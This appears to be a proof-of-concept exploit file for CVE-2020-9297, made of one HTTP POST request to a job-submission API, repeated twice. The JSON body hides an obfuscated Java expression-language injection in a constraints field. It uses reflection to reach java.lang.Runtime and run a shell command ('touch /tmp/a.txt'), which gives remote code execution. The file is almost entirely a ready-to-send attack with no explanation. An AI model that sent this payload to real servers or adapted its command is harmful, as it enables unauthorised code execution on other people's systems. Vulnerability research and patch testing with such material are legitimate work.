bsysop/CVE-2020-9297_poc.txt

## CVE-2020-9297_poc.txt
POST /api/v3/jobs HTTP/1.1
Host: host:7001
User-Agent: Mozilla/5.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-type: application/json
Content-Length: 735

{
    "applicationName": "localtest",
    "owner": {"teamEmail": "me@me.com"},
    "container": {
      "image": {"name": "alpine", "tag": "latest"},
      "entryPoint": ["/bin/sleep", "1h"],
      "securityProfile": {"iamRole": "test-rasdole", "securityGroups": ["sg-testasdasd"]},
  "softConstraints": { "constraints": {" #{''.class.class.methods[0].invoke(null, 'java.lang.'+''.class.methods[59].invoke('r')+'untime').methods[6].invoke(''.class.class.methods[0].invoke(null, 'java.lang.'+''.class.methods[59].invoke('r')+'untime')).exec('touch /tmp/a.txt')}": "zxczxc"}}
    },
    "batch": {
      "size": 1,
      "runtimeLimitSec": "3600",
      "retryPolicy":{"delayed": {"delayMs": "1000", "retries": 3}}
    }
  }
	POST /api/v3/jobs HTTP/1.1
	Host: host:7001
	User-Agent: Mozilla/5.0
	Connection: close
	Upgrade-Insecure-Requests: 1
	Content-type: application/json
	Content-Length: 735

	{
	"applicationName": "localtest",
	"owner": {"teamEmail": "me@me.com"},
	"container": {
	"image": {"name": "alpine", "tag": "latest"},
	"entryPoint": ["/bin/sleep", "1h"],
	"securityProfile": {"iamRole": "test-rasdole", "securityGroups": ["sg-testasdasd"]},
	"softConstraints": { "constraints": {" #{''.class.class.methods[0].invoke(null, 'java.lang.'+''.class.methods[59].invoke('r')+'untime').methods[6].invoke(''.class.class.methods[0].invoke(null, 'java.lang.'+''.class.methods[59].invoke('r')+'untime')).exec('touch /tmp/a.txt')}": "zxczxc"}}
	},
	"batch": {
	"size": 1,
	"runtimeLimitSec": "3600",
	"retryPolicy":{"delayed": {"delayMs": "1000", "retries": 3}}
	}
	}